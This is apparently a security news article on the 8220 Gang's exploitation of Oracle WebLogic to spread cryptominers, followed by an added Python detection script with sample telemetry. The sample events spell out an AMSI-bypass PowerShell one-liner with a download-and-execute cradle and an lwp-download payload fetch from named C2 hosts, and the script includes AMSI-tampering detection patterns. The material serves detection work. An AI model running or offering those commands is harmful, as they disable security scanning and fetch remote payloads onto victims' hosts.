8220 Gang Exploiting Oracle WebLogic Flaw to Hijack Servers and Mine Cryptocurrency

May 18, 2023 | Ravie Lakshmanan | Cryptocurrency / Server Security

The notorious cryptojacking group tracked as 8220 Gang has been observed exploiting a six-year-old security flaw in Oracle WebLogic servers to ensnare vulnerable instances in a botnet and distribute cryptocurrency-mining malware.

The flaw in question is CVE-2017-3506 (CVSS score: 7.4), an XML deserialization issue in the WebLogic WLS-WSAT web services component that, when successfully exploited, allows an unauthenticated attacker to remotely execute arbitrary commands. Oracle's original April 2017 fix for this component was later bypassed (tracked separately as CVE-2017-10271), so a server should be on a release that addresses both issues.

"This allows attackers to gain unauthorized access to sensitive data or compromise the entire system," Trend Micro researcher Sunil Bharti said in a report published this week.

8220 Gang, first documented by Cisco Talos in late 2018, is so named for its original use of port 8220 for command-and-control (C2) network communications.

"8220 Gang identifies targets by scanning for misconfigured or vulnerable hosts on the public Internet", SentinelOne noted last year. "The 8220 Gang is known to use SSH brute force attacks after infection in order to move laterally within a compromised network."

Earlier this year, Sysdig detailed attacks mounted by the "low-skill" crimeware group between November 2022 and January 2023 that aimed to breach vulnerable Oracle WebLogic and Apache web servers and deploy a cryptocurrency miner.

The group has also been observed using an off-the-shelf malware downloader known as PureCrypter and a crypter codenamed ScrubCrypt to conceal the miner payload and evade detection by security software.

In the latest attack chain documented by Trend Micro, the Oracle WebLogic Server vulnerability is exploited to deliver a PowerShell payload, which in turn creates another obfuscated PowerShell script in memory.

This newly created PowerShell script disables the Windows Antimalware Scan Interface (AMSI) and launches a Windows binary that subsequently reaches out to a remote server to retrieve a "meticulously obfuscated" payload.


The intermediate DLL, meanwhile, is configured to download a cryptocurrency miner from one of three C2 servers: 179.43.155[.]202, work.letmaker[.]top, and su-94.letmaker[.]top, using TCP ports 9090, 9091, or 9092.

Trend Micro said the recent attacks also involved the abuse of a legitimate Linux tool called lwp-download (the command-line fetcher shipped with the Perl libwww-perl package) to save arbitrary files on the compromised host.

"lwp-download is a Linux utility present on various platforms by default, and 8220 Gang making this part of any malware routine can affect a number of services, even if reused more than once," Bharti said.

"Given the threat actor's tendency to reuse tools for different campaigns and abuse legitimate tools as part of the arsenal, organizations' security teams could be challenged to find other detection and blocking solutions to defend against attacks that abuse this utility".
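As an added example (not code from the Trend Micro report or from this article), the following Python script runs simple detection rules over constructed sample telemetry covering the three behaviours described above: the AMSI-disabling PowerShell stage, lwp-download fetching a payload, and outbound connections to the listed C2 hosts on TCP 9090, 9091 or 9092. The C2 hosts and ports are the ones the article names; the event format, the AMSI-tampering strings, the hostnames and the sample events are assumptions made for illustration.

```python
"""Added example: rule-based detection over constructed telemetry for the
8220 Gang tradecraft described in the article. Not code from Trend Micro or
The Hacker News; event format, AMSI strings and sample events are assumptions."""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# C2 hosts and ports quoted in the article (stored refanged).
C2_HOSTS = {"179.43.155.202", "work.letmaker.top", "su-94.letmaker.top"}
C2_PORTS = {9090, 9091, 9092}

# Generic strings seen in PowerShell AMSI tampering (assumption: the article
# does not quote the campaign's exact script, so these are common patterns).
AMSI_PATTERNS = [
    re.compile(r"amsiInitFailed", re.I),
    re.compile(r"System\.Management\.Automation\.AmsiUtils", re.I),
    re.compile(r"AmsiScanBuffer", re.I),
    re.compile(r"amsi\.dll", re.I),
]
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""", re.I)
LWP_RE = re.compile(r"(^|/|\s)lwp-download(\s|$)")


@dataclass
class Alert:
    rule: str
    severity: str
    host: str
    detail: str


def refang(text: str) -> str:
    """Turn defanged indicators ('[.]', 'hxxp') back into matchable form."""
    return text.replace("[.]", ".").replace("hxxp", "http")


def c2_match(url: str):
    """Return (host, port) if url points at a listed C2 host, else None."""
    parts = urlsplit(refang(url))
    host = (parts.hostname or "").lower()
    try:
        port = parts.port
    except ValueError:
        port = None
    return (host, port) if host in C2_HOSTS else None


def check_script_block(ev: dict) -> list:
    """PowerShell script block text (e.g. Event ID 4104): AMSI tampering, C2 URLs."""
    alerts = []
    hits = [p.pattern for p in AMSI_PATTERNS if p.search(ev["script"])]
    if hits:
        alerts.append(Alert("powershell_amsi_tamper", "high", ev["host"], ", ".join(hits)))
    for url in URL_RE.findall(refang(ev["script"])):
        if c2_match(url):
            alerts.append(Alert("powershell_c2_download", "critical", ev["host"], url))
    return alerts


def check_process(ev: dict) -> list:
    """Process execution: lwp-download fetching from a C2 host is critical; any
    other lwp-download use is only logged at low severity, because the tool is
    legitimate and present by default (the caveat the article raises)."""
    cmd = refang(ev["cmdline"])
    if not LWP_RE.search(cmd):
        return []
    for url in URL_RE.findall(cmd):
        if c2_match(url):
            return [Alert("lwp_download_c2", "critical", ev["host"], url)]
    return [Alert("lwp_download_use", "low", ev["host"], cmd)]


def check_network(ev: dict) -> list:
    """Outbound connection to a listed C2 host on one of the listed ports."""
    dst = refang(ev["dst"]).lower()
    if dst in C2_HOSTS and ev["dport"] in C2_PORTS:
        return [Alert("c2_connection", "critical", ev["host"], f"{dst}:{ev['dport']}")]
    return []


HANDLERS = {"script_block": check_script_block, "process": check_process, "network": check_network}


def evaluate(events: list) -> list:
    """Run every event through the handler for its kind and collect alerts."""
    alerts = []
    for ev in events:
        alerts.extend(HANDLERS[ev["kind"]](ev))
    return alerts


# Constructed sample telemetry (not real logs); two benign events are included.
SAMPLE_EVENTS = [
    {"kind": "script_block", "host": "wls-prod-01", "script":
        "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
        ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);"
        "IEX (New-Object Net.WebClient).DownloadString('http://work.letmaker[.]top:9090/x')"},
    {"kind": "script_block", "host": "ws-12", "script": "Get-Service | Where-Object Status -eq 'Running'"},
    {"kind": "process", "host": "web-03", "user": "weblogic",
     "cmdline": "lwp-download http://179.43.155[.]202:9091/payload /tmp/.x"},
    {"kind": "process", "host": "web-03", "user": "ops",
     "cmdline": "lwp-download https://internal.example.com/release.tgz /tmp/release.tgz"},
    {"kind": "network", "host": "web-03", "dst": "su-94.letmaker[.]top", "dport": 9092},
    {"kind": "network", "host": "web-03", "dst": "10.0.0.5", "dport": 443},
]

if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(f"[{a.severity:8}] {a.rule:24} {a.host:12} {a.detail}")
```

Running the script yields five alerts: two for the AMSI-tampering script block (the tamper strings and the C2 download URL), one critical and one low-severity lwp-download alert, and one for the connection to su-94.letmaker[.]top:9092. The low-severity alert on the benign lwp-download invocation is deliberate: it keeps an audit trail for triage without blocking a default utility, which is the practical answer to the detection problem Bharti describes. Network-layer indicators should be maintained separately from the binary-name rule, since the group rotates infrastructure more readily than tooling.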
